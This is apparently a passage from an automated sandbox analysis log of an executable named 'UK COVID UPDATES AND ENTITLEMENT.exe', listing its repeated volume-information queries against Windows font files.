Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
